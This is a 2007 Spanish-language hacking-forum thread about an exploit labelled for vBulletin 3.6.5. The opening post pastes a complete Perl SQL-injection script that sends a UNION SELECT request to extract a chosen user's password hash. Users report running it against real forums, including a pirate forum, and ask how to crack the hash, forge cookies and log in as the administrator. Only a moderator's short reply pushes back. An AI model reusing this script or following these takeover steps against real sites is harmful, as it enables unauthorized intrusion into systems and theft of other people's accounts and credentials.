elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 10:09  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  duda con exploit para vbulletin 3.6.5
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: duda con exploit para vbulletin 3.6.5  (Leído 2,203 veces)
Crazy 007

Desconectado Desconectado

Mensajes: 12


Ver Perfil
duda con exploit para vbulletin 3.6.5
« en: 24 Abril 2007, 01:29 »

hola, buscando en internet encontre un exploit para vbulletin 3.6.5, q es este q les pongo aca:

Código:
#!/usr/bin/perl

use IO::Socket;

print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};

if (!$ARGV[2]) {

print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid

perl dbbxpl.pl www.somesite.com /forum/ 1

};

}

$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print "-----------------------------------------------------------------------
-------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "-----------------------------------------------------------------------
-------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .=

"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

20WHERE%20(uid='".$user ;

print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

print "--[ REPORT ]-----------------------------------------------------------------------
-------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "-----------------------------------------------------------------------
---------------\r\n";

}
exit();
}

}
print "-----------------------------------------------------------------------
-------------------------\r\n";


bueno, lo probe con un foro pirata q encontre por ahi, y me dio la pass cifrada, el tema es q no me dio el salt, y si no me da el salt nose como crackearla, alguien sabe como puedo hacerme con el admin igual o como puedo crackear dicha pass cifrada sin el salt ?

desde ya gracias.
En línea
[VolkS]

Desconectado Desconectado

Mensajes: 288


[Argentina]


Ver Perfil
Re: duda con exploit para vbulletin 3.6.5
« Respuesta #1 en: 26 Abril 2007, 03:01 »

si tenes el pass en md5, podes creackearla en www.milw0rm.com
en el Cracker, no siempre se puede crackear, si existe en un diccionario si.
En línea

gblaze

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: duda con exploit para vbulletin 3.6.5
« Respuesta #2 en: 26 Abril 2007, 03:24 »

disculapa, pero como yo podria usar ese exploit??
En línea
rakax


Desconectado Desconectado

Mensajes: 331


http://raka.uni.cc


Ver Perfil WWW
Re: duda con exploit para vbulletin 3.6.5
« Respuesta #3 en: 27 Abril 2007, 04:02 »

Pues la verdad despues de encontrar par de webs vulnerables e intentar crackear la hash me di cuenta de k no es md5 sino k segun me dijo el brujo esa hash esta cifrada varias veces y es muy dificil sacar la passs en texto plano.Es mejor cabiar una cookie de el foro. pero ami no me a funcionado, he cambiado los datos del pass y el id del usuario puse el user 1 y la hash del user 1 k es el admi pero no surve entra con mi cuenta. si alguien sabe me explica por favor gracias.
Saludos
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
Crazy 007

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: duda con exploit para vbulletin 3.6.5
« Respuesta #4 en: 27 Abril 2007, 04:22 »

nop, yo tmb probe con cookie y no hubo caso, otra cosa rara es q si pongo cualkier valor como id, me tira siempre la misma hash, yo por lo menos con este exploit, renuncio.
En línea
rakax


Desconectado Desconectado

Mensajes: 331


http://raka.uni.cc


Ver Perfil WWW
Re: duda con exploit para vbulletin 3.6.5
« Respuesta #5 en: 27 Abril 2007, 06:05 »

Bueno esto habria k preguntarselo al k hizo el exploit, para k hace un exploit k nos da una hash con la cual no se puede hacer nada :S
de todas formas mi duda sigue en pie,¿como cambio la hash para k me loguee como admin, por k poniendo en id 1 y donde esta la hash la del admin no tira.
Saludos
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
electron1c

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: duda con exploit para vbulletin 3.6.5
« Respuesta #6 en: 29 Abril 2007, 06:36 »

yo lo probe en un foro , pero no me da resultados , debajo del report aparece todo vacio

Citar
[~] PREPARE TO CONNECT...
  • CONNECTED
  • [~] SENDING QUERY...
  • DONE!

--[ REPORT ]---------------------------------------------------------
----------------
---------------------------------------------------------------------
----------------

soluciones ?
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: duda con exploit para vbulletin 3.6.5
« Respuesta #7 en: 29 Abril 2007, 07:27 »

aprende a programar, ve donde esta la vulnerabildiad.. lee las reglas.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda de exploit para windows 7
Hacking Básico
oliver91 7 2,751 Último mensaje 3 Junio 2011, 20:10
por oliver91
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines